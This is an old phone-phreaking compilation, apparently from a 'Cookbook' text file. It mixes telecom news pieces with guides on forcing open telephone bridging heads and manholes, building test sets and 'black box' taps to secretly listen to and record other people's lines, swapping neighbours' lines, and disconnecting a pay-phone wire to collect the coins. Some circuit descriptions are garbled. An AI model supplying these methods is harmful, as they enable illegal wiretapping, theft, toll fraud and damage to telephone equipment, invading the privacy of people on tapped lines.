as well. Everything is
kept track of in its records.
The aforementioned facts show that ESS has
made the jobs of organizations such as the FBI, NSA, and
other phone company
security forces easier. Tracing can be done in a matter of microseconds, and the
result will be conveniently printed out on the monitor of a phone company
officer. ESS is also
programmed to pick up any "foreign tones" on the phone
line such as the many varied tones emulated by
boxes.
ESS can be
identified by a few features common in it. The 911 emergency service is covered
in the
later versions of ESS. Also, you are given the dial tone first when
using a pay phone unlike that of
SxS. Calling services like call forwarding,
speed calling, and call waiting are also common to ESS.
One other feature
common to ESS is ANI (Automatic Number Identification) for long distance calls.
As
you can see, ESS is basically the zenith of all switching systems, and it
will probably plague the
entire country by the early 1990's. Soon after, we
should be looking forward to a system called CLASS.
This switching system
will contain the feature of having the number of the person that is calling you
printed out on your phone.
What have I concluded about these
switching systems? Well, they are not good enough. I know a few
people
employed by the phone company, and I know for a fact that they do not have
enough time these
days to worry about code users, especially in large,
metropolitan areas. So, I will go out on a limb
here, and say that a large
portion of people will never have to worry about the horrors of ESS. ]
Written by Ye Cap'n
New Gizmo Can Change Voice Gender
The
most amazing device has turned up in the new Hammacher Schlemmer catalog: the
telephone voice
gender changer.
What it does is change the pitch of
your voice from, say, soprano to bass -- a most efficient way to
dissuade an
obscene phone caller just as he's getting warmed up.
That is not the
same as running a 45 r.p.m. record at 33. In digital conversion, the pitch can
be
changed without altering the speed.
The device runs on a 9-volt
batter and attaches to the telephone mouth piece with a rubber coupler
that
takes but a moment to slip on and off.
With the changer switched on,
says Lloyd Gray, a Hammacher Schlemmer technical expert, "the effect is
similar to what you hear when they interview an anonymous woman on
television and disguise her voice
by deepening it." "It's better for
changing a woman's voice to a man's than the other way around,"
Gray said. A
man can use it to raise the pitch of his voice, but he still won't sound like a
woman."
A man could, however, use the changer to disguise his voice. But
with the device set on high, Gray's
voice still could be identified as his
own. On low, his normal tenor became so gravel like that the
words were
unintelligible. ] Supplied by Tracker and The Reporter
We look for
information in anyway related to the newsletter. If you have something of
interests, or
something that you saw on television, or in the newspaper,
then upload it to one of the boards listed
below. You will receive full
credit.
Pirate's Hollow.......(415)593-6784
Bate's
Motel..........(619)267-0293
Index
The Remote Informer Newsletter!
November TRI Issue: 04
The Editors: Tracker, Ye Cap'n, Norman Bates,
and The Reporter
AT&T Rates
WASHINGTON -- American Telephone
& Telegraph Co. proposed Tuesday to lower its interstate
long-distance
rates by an average of 3.6 percent to reflect reduced costs in connecting to the
local
telephone network.
The largest decrease -- 6.3 percent --
would be seen in day time prices "because of the need to make
those rates
more competitive," AT&T said.
Rates for calls made during evening
hours would drop 2.2 percent and calls made during the late night
and
weekends would be cut by 0.8 percent, the company said.
The rate
reductions would take effect Jan. 1, if they are approved by the Federal
Communications
Commission.
Reacting to the proposed price cuts, MCI
Communications Corp. and US Sprint Communications Co., the
nation's
second-largest and third-largest long distance companies respectively, said
their response
would depend on what the FCC finally approves but both said
they intended to remain competitive with
AT&T. AT&T, the nation's
largest long-distance company, proposed to the FCC that its rates drop as
much as $800 million, but AT&T said the exact amount will depend on the
access charges the FCC allows
the local telephone companies to collect from
long distance carriers, which must pay the fees to hook
into the phone local
network.
AT&T has challenged the new access rates filed by the
regional Bell operating companies, contending
they are more than $1 billion
too high. In proposing its new rates, the long-distance leader told the
FCC
it expects local companies' access fees to fall by at least $200 million --
which would amount to
an average rate reduction of less than 1 percent. But
the company said it believes the FCC will order
an additional $600 million
in reductions based on AT&T's challenge.
"We're confident the FCC
will recognize that access charges filed by the local telephone companies
need to be substantially reduced, which would mean more savings for our
customers," said Larry
Garfinkel, AT&T vice president for marketing.
He said the company filed its proposed rates based on disputed charges
because "we wanted to let the
public react ... and further to let the FCC
have full knowledge of where we were heading given our
expectation that we
had a valid basis for our dispute."
AT&T's long-distance rates have
fallen by about 34 percent since the company was stripped of its local
operating companies by an antitrust decree nearly four years ago.
Since then, phone rate payers have been paying a larger share of the
costs of maintaining the local
network through monthly subscriber line
charges, now $2.60 for residential customers.
That has reduced the
long-distance companies' share of local network expenses, which they pay in the
form of access charges.
Jack Grubman, a telephone analyst with
PaineWebber Inc., said AT&T's proposal targets business
customers
because "that's where the competition is and where the better (profit) margins
are." In
addition, it aims to keep the pressure on competition in
international calling by extending discounts
to more customers. Grubman
added that, if the company's rate proposal is approved by the FCC, he would
expect no further cuts in AT&T rates in 1988.
Wendell Lind,
AT&T administrator of rates and tariffs, said the cuts for business and
residential
customers are about the same because business cuts are offset by
a proposed $128 million increase in
AT&T's private line rates.
AT&T is the only long-distance company whose rates are regulated by
the FCC, but its prices set the
pace for the industry. Though AT&T is
far larger than any of its competitors, its market share has
been declining
since divestiture and the company now says it serves about 75 percent of the
market.
In addition to the reductions in basic long-distance rates,
AT&T proposed cutting prices by 5 percent
and 5.7 percent for its
Pro-America calling plans.
The company also proposed to reduce prices by
2.9 percent for its 800 Service customers and 4.4
percent for WATS
customers, although it would increase the monthly access line charges for those
plans
by $3.20 to reflect higher special access charges filed by the local
phone companies. ] Supplied by
Tracker and The Reporter
US Sprint
Operator Service Traffic Increases 40%
New Center Added In Dallas
ORLANDO, Fla. -- US Sprint Wednesday announced its long distance
operators who began saying, "May I
help you?" just five months ago, are now
handling 3.5 million calls a month.
The fiber-optic long-distance
carrier, offering the only operator service alternative to AT&T has
experienced a 40 percent growth in operator service calls since it announced
its service July 1.
Amanda Weathersby, US Sprint vice president of
product marketing, said Tuesday, "More and more people
are taking advantage
of our call completion assistance and alternative billing arrangements.
"Customer surcharges are the same as AT&T with the added benefit of
US Sprint's fiber-optic quality
and lower long-distance rates."
US
Sprint currently offers person-to-person, station-to-station, call completion
and collect calling.
US Sprint has announced an agreement with US WEST
Service Link that will allow anyone to call on US
Sprint and charge their
calls to a Regional Bell Operating Co. calling card beginning in first quarter
1988.
"Previously, our operator service was available only on
pre-subscribed US Sprint phones and recently
we added operator assistance
for US Sprint FON CARD customers," Weathersby said.
"With this new
agreement, we'll be able to expand our operator service to markets such as pay
phones,
hospitals, and hotels/motels."
The newest 24-hour operator
service center in Dallas began operations on Oct. 5. US Sprint's other
operator service centers are in: Cherry Hill, N.J.; Atlanta; Lombard, Ill.
and Reno, Nev.
US Sprint is a joint venture of United Telecommunications
Inc. of Kansas City, Mo. and GTE Corp. of
Stamford, Conn. ] Supplied by
Tracker and The Reporter
Pacific Bell Pursuing Calling Card Thief
SAN FRANCISCO--(BW)--Pacific Bell is warning consumers to protect their
telephone calling cards like
any other credit card in the wake of a series
of frauds by people posing as phone company employees.
A Pacific Bell
spokesman says customers in the 213, 805 and 916 area codes are being victimized
by
someone who says he is a telephone company employee investigating calling
card fraud. The individual
calls people at home at odd hours, asking for
their calling card numbers. He then sells the numbers to
people who use the
numbers to make long distance phone calls.
As recently as Monday of this
week, 180 long distance calls were billed to a Sacramento area resident
who
had given his number to the thief just three hours earlier.
According to
Pacific Bell, this kind of scheme and other forms of calling card fraud cost
telephone
customers nationwide half a billion dollars a year.
The
company offered these tips to consumers to avoid becoming a victim of calling
card fraud:
Never give your calling card number or personal
identification number to anyone. Any telephone company
employee with a
legitimate need to know the number has access to it.
Treat your calling
card like any other credit card. Report its loss immediately by calling the 800
number on the back of the card 800-621-0430.
If you receive a
suspicious call regarding your telephone calling card, report it by calling the
800
number on the back of the card.
If you receive a call from
someone claiming to be a telephone company employee and asking for your
calling card number, ask for a name and number to call back. Then call the
local Pacific Bell business
office to report the incident.
One
suspect was arrested in Southern California last week by a quick thinking
customer who did just
that. Pacific Bell immediately contacted the local
police department. A suspect holding seven stolen
calling card numbers was
arrested minutes later.
Pacific Bell and long-distance telephone
companies will credit customers for calling card charges
determined to be
fraudulent. Pacific Bell is a subsidiary of Pacific Telesis Group, a diversified
telecommunications corporation based in San Francisco. ] Supplied by Tracker
and The Reporter
We look for information in anyway related to the
newsletter. If you have something of interests, or
something that you saw on
television, or in the newspaper, then upload it to one of the boards listed
below. You will receive full credit.
Pirate's
Hollow..........(415)593-6784
Bates Motel..............(619)267-0293
Brought to you in the Cookbook IV courtesy of Exodus!!!!!!!!!!
Index
The Phreaker's Guide to Loop Lines courtesy of the Jolly Roger
A loop is a wonderous device which the telephone company created as test
numbers for telephone
repairmen when testing equipment. By matching the tone
of the equipment with the tone of the loop,
repairmen can adjust and test
the settings of their telephone equipment.
A loop, basically, consists
of two different telephone numbers. Let's use A and B as an example.
Normally if you call A, you will hear a loud tone (this is a 1004 hz tone),
and if you call B, the
line will connect, and will be followed by silence.
This is the format of a loop line. Now, if somebody calls A and someone
else calls B--Viola!--A and B
loop together, and one connection is made. Ma
Bell did this so repairmen can communicate with each
other without having to
call their own repair office. They can also use them to exchange programs,
like for ANA or Ringback. Also, many CO's have a "Loop Assignment Center".
If anyone has any
information on these centers please tell me.
Anyway, that is how a loop is constructed. From this information, anyone
can find an actual loop line.
Going back to the A and B example, Note: the
tone side and the silent side can be either A or B. Don't
be fooled if the
phone company decides to scramble them around to be cute.
As you now
know, loops come in pairs of numbers. Usually, right after each other. For
example:
817-972-1890 and 817-972-1891
Or, to save space, one loop
line can be written as 817-972-1890/1. This is not always true. Sometimes,
the pattern is in the tens or hundreds, and, occaisionally, the numbers are
random.
In cities, usually the phone company has set aside a phone
number suffix that loops will be used for.
Many different prefixes will
correspond with that one suffix.
In Arlington, Texas, a popular suffix
for loops is 1893 and 1894, and a lot of prefixes match with
them to make
the number. For Example:
* 817-460-1893/4
* 817-461-1893/4
*
817-465-1893/4
* 817-467-1893/4
* 817-469-1893/4 ...are all loops...
or a shorter way to write this is:
817-xxx-1893/4
xxx= 460, 461,
465, 467, 469
Note: You can mix-and-match a popular suffix with other
prefixs in a city, and almost always find
other loops or test numbers.
Note: For Houston, the loop suffixes are 1499 and 1799. And for Detroit it's
9996 and 9997.
When there are a large number of loops with the same prefix
format, chances are that many loops will
be inter-locked. Using the above
example of Arlington loops again, (I will write the prefixes to save
space)
460, 461, and 469 are interlocked loops. This means that only one side can be
used at a given
time. This is because they are all on the same circuit.
To clarify, if 817-461-1893 is called, 817-460 and 469-1893 cannot be
called because that circuit is
being used. Essentialy, interlocked loops are
all the same line, but there are a variety of telephone
numbers to access
the line.
Also, if the operator is asked to break in on a busy loop line
he/she will say that the circuit is
overloaded, or something along those
lines. This is because Ma Bell has taken the checking equipment
off the
line. However, there are still many rarely used loops which can be verfied and
can have
emergency calls taken on them.
As you have found out, loops
come in many types. Another type of loop is a filtered loop. These are
loop
lines that the tel co has put a filter on, so that normal human voices cannot be
heard on either
line. However, other frequencies may be heard. It all
depends on what the tel co wants the loop to be
used for. If a loop has
gotten to be very popular with the local population or used frequently for
conferences, etc. the tel co may filter the loop to stop the unwanted
"traffic". Usually, the filter
will be removed after a few months, though.
----------------Brought to you by Exodus
Index
How Ma Bell Works by the Jolly Roger
In this article, I will first describe the termination, wiring, and
terminal hardware most commonly
used in the Bell system, and I will include
section on methods of using them.
LOCAL NETWORK
The local
telephone network between the central office/exchange and the telephone
subscribers can be
briefly described as follows:
From the central office
(or local exchange) of a certain prefix(es), underground area trunks go to
each area that has that prefix (Usually more than one prefix per area.) At
every few streets or tract
areas, the underground cables surface. They then
go to the telephone pole (or back underground,
depending on the area) and
then to the subsribers house (or in the case of an apartment building or
mutliline business, to a splitter or dis- tribution box/panel). Now that we
have the basics, I'll try
and go in-depth on the subject.
UNDERGROUND CABLES
These are sometimes inter-office trunks, but
usually in a residential area they are trunk lines that
go to bridging heads
or distribution cases. The cables are about 2-3 inches thick (varies), and are
either in a metal or pvc-type pipe (or similiar). Rarely (maybe not in some
remote rural areas) are
the cables just 'alone' in the ground. Instead they
are usually in an underground cement tunnel
(resembles a small sewer or
stormdrain.)
The manholes are >heavy< and will say 'Bell system' on
them. they can be opened with a 1/2 inch wide
crowbar (Hookside) inserted in
the top rectangular hole. There are ladder rungs to help you climb
down. You
will see the cable pipes on the wall, with the blue and white striped one being
the
inter-office trunk (at least in my area). The others are local lines,
and are usually marked or color
coded. There is almost always a posted color
code chart on the wall, not to mention Telco manuals
describing the cables
and terminals, so I need not get into detail. Also, there is usually some kind
of test equipment, and often Bell test sets are left in there.
BRIDGING HEADS
The innocent-looking grayish-green boxes. These
can be either trunk bridges or bridging for
residences. The major trunk
bridging heads are usually larger, and they have the 'Western Electric'
logo
at the bottom, whereas the normal bridging heads (which may be different in some
areas-depending
on the company you are served by. GTE B.H.'s look slightly
different. Also, do not be fooled by
sprinkler boxes!) They can be found in
just about every city.
To open a bridging head: if it is locked (and
you're feeling destructive), put a hammer or crowbar
(the same one you used
on the manhole) in the slot above the top hinge of the right door. Pull hard,
and the door will rip off. Very effective! If it isn't locked (as usual),
take a 7/8 inch hex socket
and with it, turn the bolt about 1/8 of a turn to
the right (you should hear a spring release inside).
Holding the bolt, turn
the handle all the way to the left and pull out.
To Check for a test-set
(which are often left by Bell employees), go inside - First check for a
test-set (which are often left by Bell employees). There should be a panel
of terminals and wires.
Push the panel back about an inch or so, and rotate
the top latch (round with a flat section)
downward. Release the panel and it
will fall all the way forward. There is usually a large amount of
wire and
extra terminals. The test-sets are often hidden here, so don't overlook it
(Manuals, as well,
are sometimes placed in the head). On the right door is a
metal box of alligator clips. Take a few
(Compliments of Bell.). On each
door is a useful little round metal device. (Says 'insert gently' or'
clamp
gently - do not overtighten' etc..) On the front of the disc, you should find
two terminals.
These are for your test set. (If you dont have one, dont
despair -I'll show you ways to make basic
test sets later in this article).
Hook the ring (-) wire to the 'r' terminal; and the tip (+) wire to the
other. (By the way, an easy
way to determine the correct polarity is with a
1.5v LED. Tap it to the term. pair, if it doesnt
light, switch the poles
until it does. When it lights,find the longer of the two LED poles: This one
will be on the tip wire (+). Behind the disc is a coiled up cord. This
should have two alligator clips
on it.. Its very useful, because you dont
have to keep connecting and disconnecting the fone (test
set) itself, and
the clips work nicely.
On the terminal board, there should be about 10
screw terminals per side. Follow the wires, and you
can see which cable
pairs are active. Hook the clips to the terminal pair, and you're set! Dial out
if
you want, or just listen (If someone's on theline). Later, I'll show you
a way to set up a true 'tap'
that will let the person dial out on his line
and receive calls as normal, and you can listen in the
whole time. More
about this later...
On major prefix-area bridging heads, you can see
'local loops' ,which are two cable pairs (cable pair
= ring+tip, a fone
line) that are directly connected to each other on the terminal board. These
'cheap
loops' as they are called, do not work nearLy as well as the existing
ones set up in the switching
hardware at the exchange office. (Try scanning
your prefixes' 00xx to 99xx #'s.) The tone sides will
announce themselves
with the 1008 hz loop tone, and the hang side will give no response. The first
person should dial the 'hang' side, and the other person dial the tone side,
and the tone should stop
if you have got the right loop.)
If you
want to find the number of the line that you're on, you can either try to
decipher the
'bridging log' (or whatever), which is on the left door. If
that doesnt work, you can use the
follwing:
ANI # (Automatic Number
ID)
This is a Telco test number that reports to you the number that
youre calling from (It's the same,
choppy 'Bell bitch' voice that you get
when you reach a disconnected #)
For the 213 NPA - Dial 1223
408 NPA -
Dial 760
914 NPA - Dial 990
These are extremely useful when messing
with any kind of line terminals, house boxes, etc.
Now that we have bridging
heads wired, we can go on... (don't forget to close and latch the box after
all... Wouldnt want GE and Telco people mad, now, would we?)
"CANS"
- Telephone Distribution Boxes
Basically, two types:
1> Large,
rectangular silver box at the end of each street.
2> Black, round, or
rectangular thing at every telephone pole.
Type 1 - This is the case that
takes the underground cable from the bridge and runs it to the
telephone
pole cable (The lowest, largest one on the telephone pole.) The box is always on
the pole
nearest the briging head, where the line comes up. Look for the
'Call before you Dig - Underground
cable' stickers.. The case box is hinged,
so if you want to climb the pole, you can open it with no
problems. These
usually have 2 rows of terminal sets.
You could try to impersonate a
Telco technician and report the number as 'new active' (giving a fake
name
and fake report, etc.) I dont recommend this, and it probably won't (almost
positively won't)
work, but this is basically what Telco linemen do).
Type 2 - This is the splitter box for the group of houses around the
pole (Usually 4 or 5 houses). Use
it like I mentioned before. The terminals
(8 or so) will be in 2 horizontal rows of sets. The extra
wires that are
just 'hanging there' are provisions for extra lines to residences (1 extra line
per
house, thats why the insane charge for line #3!) If its the box for your
house also, have fun and swap
lines with your neighbor! 'Piggyback' them and
wreak havoc on the neighborhood (It's eavesdropping
time...) Again, I don't
recommend this, and its difficult to do it correctly. Moving right along...
APARTMENT / BUSINESS MULTILINE
DISTRIBUTION BOXES
Found
outside the buliding (most often on the right side, but not always... Just
follow the wire from
the telephone pole) or in the basement. It has a
terminal for all the lines in the building. Use it
just like any other
termination box as before. Usually says 'Bell system' or similar. Has up to 20
terminals on it (usually.) the middle ones are grounds (forget these). The
wires come from the cable
to one row (usually the left one), with the other
row of terminals for the other row of terminals for
the building fone wire
pairs. The ring (-) wire is usually the top terminal if the set in the row (1
of 10 or more), and the tip is in the clamp/screw below it. This can be
reversed, but the cable pair
is always terminated one-on-top-of-each- other,
not on the one next to it. (I'm not sure why the other
one is there,
probably as aprovision for extra lines) Don't use it though, it is usually to
close to
the other terminals, and in my experiences you get a noisy
connection.
Final note: Almost every apartment, business, hotel, or
anywhere there is more than 2 lines this
termination lines this termination
method is used. If you can master this type, you can be in control
of many
things... Look around in your area for a building that uses this type, and
practice hooking up
to the line, etc.
As an added help,here is the
basic 'standard' color-code for multiline terminals/wiring/etc...
Single
line: Red = Ring
Green = Tip
Yellow = Ground *
* (Connected to the
ringer coil in individual and bridged
ringer phones (Bell only) Usually
connected to the green
(Tip)
Ring (-) = Red
White/Red Stripe
Brown
White/Orange Stripe
Black/Yellow Stripe
Tip (+) = Green
(Sometimes
yellow, see above.)
White/Green Stripe
White/Blue Stripe
Blue
Black/White Stripe
Ground = Black
Yellow
RESIDENCE
TERMINAL BOX
Small, gray (can be either a rubber (Pacific Telephone) or
hard plastic (AT & T) housing deal that
connects the cable pair from the
splitter box (See type 2, above) on the pole to your house wiring.
Only 2
(or 4, the 2 top terminals are hooked in parallel with the same line) terminals,
and is very
easy to use. This can be used to add more lines to your house or
add an external line outside the
house.
TEST SETS
Well, now
you can consider yourself a minor expert on the terminals and wiring of the
local telephone
network. Now you can apply it to whatever you want to do..
Here's another helpful item:
How to make a Basic Test-Set and how to use it
to dial out, eavsdrop, or seriously tap and record line
activity. These are
the (usually) orange hand set fones used by Telco technicians to test lines. To
make a very simple one, take any Bell (or other, but I recommend a good Bell
fone like a princess or a
trimline. gte flip fones work excllently,
though..) fone and follow the instructions below.
Note: A 'black box'
type fone mod will let you tap into their line, and with the box o, it's as if
you
werent there. they can recieve calls and dial out, and you can be
listening the whole time! very
useful. With the box off, you have a normal
fone test set.
Instructions:
A basic black box works well with
good results. Take the cover off the fone to expose the network box
(Bell
type fones only). The terminal should have a green wire going to it (orange or
different if
touch tone - doesnt matter, its the same thing). Disconnect the
wire and connect it to one pole of an
SPST switch. Connect a piece of wire
to the other pole of the switch and connect it to the terminal.
Now take a
10k hm 1/2 watt 10% resistor and put it between the terminal ad the terminal,
which should
have a blue and a white wire going to it (different for touch
tone). It should look like this:
-----Blue wire----------
!
----White wire-----!
!
10k Resistor
!
!
--Green wire--
!----
! !
SPST
What this does in effect is keep the
hookswitch / dial pulse switch (F to RR loop) open while holding
the line
high with the resistor. This gives the same voltage effect as if the fone was
'on-hook',
while the 10k ohms holds the voltage right above the 'off hook'
threshold (around 22 volts or so, as
compared to 15-17 or normal off hook 48
volts for normal 'on-hook'), giving Test Set Version 2.
Another design is
similar to the 'type 1' test set (above), but has some added features:
From
>----------------Tip------Alligator set
Clip
>----------------Ring----- ! !
x !
! !
o !
!
x---RRRRR---!
! x !
!---x !
x----0------!
x = Spst Switch
o
= Red LOD 0 = Green LED
RRRRR= 1.8k 1/2 watt xxxx= Dpst switch
resistor
When the SPST switch in on, the LED will light, and the fone will become
active. The green light
should be on. If it isn't, switch the dpst. If it
still isnt, check the polarity of the line and the
LEDs. With both lights
on, hang up the fone. They should all be off now. Now flip the dpst and pick up
the fone. The red LED shold be on, but the green shouldnt. If it is,
something is wrong with the
circuit. You wont get a dial tone if all is
correct.
When you hook up to the line with the alligator clips (Assuming
you have put this circuit inside our
fona and have put alligator clips on
the ring and tip wires (As we did before)) you should have the
spst #1 in
the off posistion. This will greatly reduce the static noise involved in hooking
up to a
line. The red LED can also be used to check if you have the correct
polarity. With this fone you will
have the ability to listen in on
>all< audible line activity, and the people (the 'eavesdropees') can
use their fone as normal. Note that test sets #1 and #2 have true 'black
boxes', and can be used for
free calls (see an article about black boxes).
Test Set Version 3
To do test set 3: Using a trimline (or
similar) phone, remove the base and cut all of the wire leads
off except for
the red (ring -) and the green (tip +). Solder alligator clips to the lug. The
wire
itself is 'tinsel' wrapped in rayon, and doesnt solder well. Inside the
one handset, remove the light
socket (if it has one) and install a small
slide or toggle switch (Radio Shack's micro- miniature spst
works well).
Locate the connection of the ring and the tip wires on the pc board near where
the jack
is located at the bottom of the handset. (The wires are sometimes
black or brow instead of red and
green, respectively). Cut the foil and run
2 pieces of wire to your switch. In parallel with the
switch add a .25 uf
200 VDC capacitor (mylar, silvered mica, ceramic, not an electrolytic). When the
switch is closed, the handset functions normally. With the switch in the
other position, you can
listen without being heard.
Note: To reduce
the noise involved in connecting the clips to a line, add a switch selectable
1000 ohm
1/2 watt resistor in series with the tip wire. Flip it in circuit
when connecting, and once on the
line, flip it off again. (or just use the
'line disc- onect' type switch as in the type 2 test set
(above)). Also
avoid touching the alligator clips to any metal parts or other terminals, for i
causes
static on the line and raises poeple's suspicions.
RECORDING
If you would like to record any activity, use test set 1 or 2 above (for
unattended recording of >all<
line activity), or just any test set if
you are going to be there to monitor when they are dialing,
talking, etc.
Place a telephone pickup coil (I recommend the Becoton T-5 TP coil or
equivalent) onto the test set,
and put the TP plug into the mic. jack of any
standard tape recorder. Hit play, rec, and pause.
Alternate pause when you
want to record (I dont think anyone should have any difficulty with this at
all...) Well, if you still can't make a test set or you dont have the parts,
there's still hope.
Alternate methods:
* Find a bell test set in a
manhole or a bridging head and 'Borrow it indefinately...
* Test sets can be
purchased from:
Techni-Tool
5 Apollo Road
Box 368
Plymouth
Meeting PA., 19462
Ask for catalog #28
They are usually $300 - $600,
and are supposed to have MF dialing capability as well as TT dialing.
They
are also of much higher quality than the standard bell test sets. If you would
like to learn more
about the subjects covered here, I suggest:
* Follow
Bell trucks and linemen or technicians and ask subtle questions. also try 611
(repair
service) and ask questions..
* Explore your area for any Bell
hardware, and experiment with it. Don't try something if you are
not sure
what youre doing, because you wouldnt want to cause problems, would you?
-----Exodus-----
Index
Getting Money out of Pay Phones by the Jolly Roger
I will now share with you my experiences with pay telephones. You will
discover that it is possible to
get money from a pay phone with a minimum of
effort. Theory: Most pay phones use four wires for the
transmission of data
and codes to the central office. Two of them are used for voice (usually red and
green), one is a ground, and the last is used with the others for the
transmission of codes.
It is with this last wire that you will be
working with. On the pay phone that I usually did this to,
it was colored
purple, but most likely will be another color.
What you will do is
simply find a pay phone which has exposed wires, such that one of them can be
disconnected and connected at ease without fear of discovery. You will
discover that it is usually a
good idea to have some electrical tape along
with you and some tool for cutting this tape.
Through trial and error,
you will disconnect one wire at a time starting with the wires different than
green and red. You do want a dial tone during this operation.
What
you want to disconnect is the wire supplying the codes to the telephone company
so that the pay
phone will not get the 'busy' or 'hang-up' command. Leave
this wire disconnected when you discover it.
What will happen: Anytime
that someone puts any amount of money into the pay phone, the deposit will
not register with the phone company and it will be held in the 'temporary'
chamber of the pay phone.
Then, (a day later or so) you just code back
to the phone, reconnect the wire, and click the hook a
few times and the
phone will dump it all out the shute. (What is happening is that the 'hangup'
code
that the phone was not receiving due to the wire being disconnected
suddenly gets the code and dumps
its' 'temporary' storage spot.)
You
can make a nice amount of money this way, but remember that a repairman will
stop by every few
times it is reported broken and repair it, so check it at
least once a day.
Enjoy and have fun.. Many phones I have done this to,
and it works well with each..
-= Exodus =-
Index
Computer Based PBX Courtesy of the Jolly Roger
(Originally an Apple ][ file for forgive the upper case!)
TO GET
A BETTER UNDERSTANDING OF WHAT A PBX CAN DO, HERE ARE A FEW BASIC
FUNDAMENTALS.THE MODERN PBX
IS A COMBINED COMPUTER,MASS STORAGE DEVICE, AND
OF COURSE A SWITCHING SYSTEM THAT CAN:
1. PRODUCE ITEMIZED,AUTOMATED BILLING
PROCEDURES,TO ALLOW THE IDENTIFICATION AND MANAGEMENT OF TOLL
CALLS.
[HAHAHA]
2. COMBINE DAYTIME VOICE GRADE COMMUNICATION CIRCUITS INTO WIDEBAND
DATA CHANNELS FOR NIGHT TIME HIGH
SPEED DATA TRANSFERS.
3. HANDLES
ELECTRONIC MAIL [ INCLUDING OFFICE MEMOS ].
4. COMBINE VOICE CHANNELS INTO A
WIDEBAND AUDIO/VISUAL CONFERENCE CIRCUIT,WITH THE ABILITY TO XFER
AND
CAPTURE SLIDES,FLIPCHARTS,PICTURES OF ANY KIND.
BOTH THE EXTERNAL AND
INTERNAL CALLING CAPACITY OF THE PBX SYSTEM MUST BE CAREFULLY CONSIDERED BECAUSE
MANY BUSINESS OPERATIONS RUN A VERY HIGH RATIO OF INTERNAL STATION TO
STATION DIALING AND A LOW
CAPACITY SYSTEM WILL NOT HANDLE THE REQUESTED
TRAFFIC LOAD.
A CRITICAL FACTOR IS THE NUMBER OF TRUNKS AND THE CENTRAL
OFFICE FACILITIES THAT ARE USED FOR OUTSIDE
CONNECTIONS.ANOTHER IS THE
NUMBER OF JUNCTIONS OR [LINKS] THAT MAKE UP THE INTERNAL CALLING PATHS.
TO UNDERSTAND THE SERVICES AVAILABLE ON A TYPICAL COMPUTER RUN PBX IT IS
NECESSARY TO INTRODUCE THE
SUBJECT OF TIME DIVISION SWITCHING.IN A TIME
DIVISION SWITCHING NETWORK ALL CONNECTIONS ARE MADE VIA A
SINGLE COMMON BUS
CALLED (OF COURSE) A 'TIME-DIVISION BUS'.EVERY LINE TRUNK THAT REQUIRES A
CONNECTION
WITH ANOTHER IS PROVIDED WITH A PORT CIRCUIT.ALL PORT CIRCUITS
HAVE ACCESS TO THE TIME DIVISION BUS
THROUGH A TIME DIVISION SWITCH. [WHEN
TWO PORTS REQUKRE CONNECTION,THEIR TIME DIVISION SWITCHES
OPERATE AT A VERY
HIGH FREQUENCY (16,000 TIMES PER SECOND).THIS TECHNIQUE,WHICH IS CALLED 'SPEECH
SAMPLING',ALLOWS MANY SIMULTANEOUS CONNECTIONS OVER THE SAME TIME DIVKSION
BUS.EACH CONNECTION IS
ASSIGNED A TIME INTERVAL,THE 'TIME SLOT' ,AND THE
NUMBER OF TIME SLOTS IDENTIFIES THE NUMBER OF
SIMULTANEOUS CONNECT- IONS
AMONG PORTS.
THE NEXT CRITICAL ITEM IS CIRCUIT PACKS.THE SYSTEM ELEMENTS
THAT WE WILL BE DESCRIBING IN FUTURE
TUTORIALS [LINES/TRUNKS/SWITCHES,MEMORY
AND CONTROL] ARE CONTAINED ON PLUG IN CIRCUIT PACKS.EACH LINE
CIRCUIT PACK
CONTAINS A NUMBER OF LINES,IN EXAMPLE,FOUR.BUT THE ASSIGNMENT OF STATION NUMBERS
TO
ACTUAL PHONE LINE CIRCUITS IS FLEXIBLE.
THE SYSTEM MEMORY IS
CONTAINED IN CIRCUIT PACKS WHICH PROVIDE THE CALL PROCESSING FUNCTIONS.THE
CIRCUIT PACKS ARE HELD IN SMALL FRAMES CALLED 'CARRIERS'.WITHIN EACH
CARRIER,THE CIRCUIT PACKS ARE
PLUGGED INTO POSITIONS: THE 'SLOTS'.EVERY
CIRCUIT CAN BE ADDRESSED BY,SAY A FIVE DIGIT NUMBER WHICH
TELLS ITS LOCATION
BY CARRIER-SLOT-CIRCUIT.... [STARTING TO GET THE IDEA?] THERE CAN BE THREE TYPES
OF
CARRIERS IN A MODERN PBX SYSTEM:
* LINE CARRIERS
* TRUNK CARRIERS
* CONTROL CARRIERS
THE LINE CARRIERS CONTAIN STATION LINES.IN
A.T.& T.'S "DIMENSION" MODEL,FOR EXAMPLE,A TOTAL OF 52 TO
64 LINES ARE
PROVIDED.THE TRUNK CARRIERS CONTAIN SLOTS FOR 16 TRUNK CIRCUIT PACKS.THE CONTROL
CARRIER
INCLUDES PROCESSOR, MEMORY,CONTROL CIRCUITRY,DATA CHANNELS FOR
ATTENDANT CONSOLE CONTROL AND TRAFFIC
MEASUREMENT OUTPUTS.
PBX SYSTEMS
WILL DIRECTLY REFLECT THE TYPES OF SERVICES OFFERED AT THE C.O.
* CCSA
*
CCIS
* PICTUREPHONES [SOONER THAN YOU THINK MY PHRIENDS] COMMON CONTROL
SWITCHING ARRANGEMENTS ( CCSA )
PERMIT ANY UNRESTRICTED TELE- PHONE STATION
TO CALL ANY OTHET INTERNAL OR EXTERNAL SYSTEM STATION
BY USING THE STANDARD
SEVEN DIGIT NUMBER.ALTERNATE ROUTING IS A FEATURE OF CCSA SERVICE THE
INTERFACILITY,ALTERNATE ROUTED CALLING PATHS ARE ACCOMPLISHED AT THE TELE-
PHONE COMPANY CENTRAL
OFFICE LEVEL,NOT AT THE PBX LEVEL.
A SYSTEM OF
INTEREST TO LARGE SCALE TELEPHONE USERS IS COMMON CHANNEL INTER- OFFICE
SIGNALLING
(CCIS).TYPICALLY,THIS TECHNIQUE EMPLOYS COMMON CHANNELS TO CARRY
ALL INTERFACILITY SIGNALLING
INSTRUCTIONS: DIAL PULSES,ON HOOK (IDLE), OFF
HOOK (BUSY),AND SO ON,BETWEEN TWO SWITCHING CENTERS.
[ GETTING WARM ].
CCIS REPLACES OLDER METHODS OF INTEROFFICE SIGNALLING SUCH AS 'IN BAND' AND
'OUT OF BAND'
TECHNIQUES. BY THE WAY,REAL PHREAKS ARE SELLING THEIR BOXES TO
IDIOTS WHO STILL THINK THE'RE WORTH
ALOT...THE FORMER (IN BAND) TRANSMITS
SIGNALLING DATA WITHIN THE NORMAL CONVERSATION
BANDWIDTH.IT'S SHORTCOMING IS
THAT FALSE INFORMATION MAY BE TRANSMITTED DUE TO UNIQUE TONE OR
NOISE
